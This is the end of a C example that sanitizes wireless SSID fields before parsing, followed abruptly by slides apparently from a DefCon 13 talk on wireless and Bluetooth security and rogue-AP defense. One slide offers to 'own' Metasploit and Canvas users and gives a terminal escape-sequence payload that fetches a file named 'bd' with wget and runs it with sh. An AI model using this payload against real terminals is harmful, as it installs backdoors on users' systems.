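 * control bytes (which include the delimiter) in them. */
static void sanitize_field(char *dst, size_t dstlen, const char *src)
{
    size_t i = 0;
    for (; src[i] != '\0' && i + 1 < dstlen; i++) {
        unsigned char c = (unsigned char)src[i];
        dst[i] = (c < 0x20 || c == 0x7f) ? '?' : (char)c;
    }
    dst[i] = '\0';
    if (i == 0)                 /* %[ cannot match an empty string */
        snprintf(dst, dstlen, "(empty)");
}

static int serialize_hardened(char *out, size_t outlen, int type,
                              const char *ssid, const char *beacon,
                              int llc, int data, int crypt)
{
    char s[FIELD_MAX], b[FIELD_MAX];
    sanitize_field(s, sizeof s, ssid);
    sanitize_field(b, sizeof b, beacon);
    return serialize_naive(out, outlen, type, s, b, llc, data, crypt);
}

/* Receiver-side fix: a short conversion count is counted and reported
 * instead of the record silently vanishing from the display. */
static unsigned rejected_records;

static int ingest(const char *line, struct net_record *r)
{
    int n = parse_record(line, r);
    if (n != EXPECTED_FIELDS) {
        rejected_records++;
        fprintf(stderr, "rejected record: %d of %d fields parsed\n",
                n, EXPECTED_FIELDS);
        return -1;
    }
    return 0;
}

int main(void)
{
    char line[2 * FIELD_MAX + 64];
    struct net_record r;
    const char *ssid = "shmoo\001";   /* constructed sample input */

    serialize_naive(line, sizeof line, 0, ssid, "beacon", 10, 20, 3);
    printf("naive:    ingest=%d\n", ingest(line, &r));

    serialize_hardened(line, sizeof line, 0, ssid, "beacon", 10, 20, 3);
    printf("hardened: ingest=%d ssid=\"%s\" crypt=%d\n",
           ingest(line, &r), r.ssid, r.crypt);
    printf("rejected so far: %u\n", rejected_records);
    return 0;
}
```

With the naive sender the embedded delimiter ends the SSID field early, the following fields shift, and the first numeric conversion hits text, so the record is rejected; the sanitized record parses completely.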



And MORE...! 

• Wanna own Metasploit & Canvas 
users? 

• Use HDM's exploits against his 
own projects? 

echo -e "\e]10;[:/Special/{ Access} wget 127.0.0.1/.bd\rsh bd\rexit\r: ]\a\e]10;[show]\a"



And Bruce gets to rant, too!



Bluetooth Security 

Things have gotten worse, not better 

- Millions more radios than last year 

- Several high profile vulnerabilities 






- Near zero focus from enterprises 

Trifinite.org's work 

- Blooover quite the uber tool 



Bluetooth Security 

Several other attacks via AT 
commands 

- Dialing, getting data, etc... not good 
things to do without authentication 

Pairing attacks, known for years, are 
now being coded and used 

WIDS still seems to equal 802.11 
tho... 

- Gonna be a bad year for IT security 



Defending Wireless Networks

We seemed to have covered a lot of 
ground on the Offensive.. What about 
Defense *boom boom* Defense! 

First there was Hot Spot Defense 
Kit (HSDK) 

- Released BH Fed 03 

- Looked for directed rogue AP attacks 
against your client 

- OS X, Linux, and Windows code 







Defending Wireless 

Networks 

At the time of HSDK, there was NO 
capability for rogue detection in 
commercially avail software 

Today, we're still not much better 

- AirDefense Mobile, some other small stuff 

- Rogues are THE BIGGEST threat against 
enterprise networks 

So, while the industry is still finding 
their whatnot with both hands, we're 
making... 



Hot Spot Defense Kit v2 

• Enterprise wireless IDS systems look 
for any attack, not just one directed 
at a particular client 

• When you are on the road (or don't 
have the "luxury" of an enterprise 
WIDS) you need the same kind of 
protection 



Hot Spot Defense Kit v2 

• HSDK v2 aims to be an 
environmental monitor of sorts 

- Looks for any zip in the wire, not just 
ones directly affecting the client 

- If you're in downtown Baltimore, and 
someone starts shooting, you tend to 
freak out even if they're not shooting at 
you... wireless shouldn't be any different 







HSDK v2 

Still under development 
Looking for: 

- Mass auth/deauth/assoc attacks 

- Fake AP signatures 

- Reinjection attacks (hard) 

- The standard rogue detection stuff from v1 

If something is detected, the green 
ball turns red (step away from the 
computer) 

- If security software isn't usable, it's useless 

DefCon 13 







Speaking of... 



• As security professionals, we sure 
haven't learned much 



- Security needs to be usable by the users 

• Users need heuristic decisions made for them 
and presented in red or green balls 

- Security admins need to act like 
professionals and have a real 
understanding of their operations 



[Figure: diagram with the labels "IT Security Professional", "Normal Users", "IDS", "Knowledge really needed by user", and "Host and Enterprise Integrity Monitoring"]






Potter's Pyramid of IT Security Needs 

[Figure: pyramid with levels labelled Software; ACLs; Firewalls, Auth / Auth; Patch Mgt, Op. Procedures]



ShmooCon 2006 

January 13-15 
Washington, D.C. 
Pre-registration is LIVE now. 
http://www.shmoocon.org 
Got an ad? Submit it! 

Here's one... 



Thanks!










Questions? 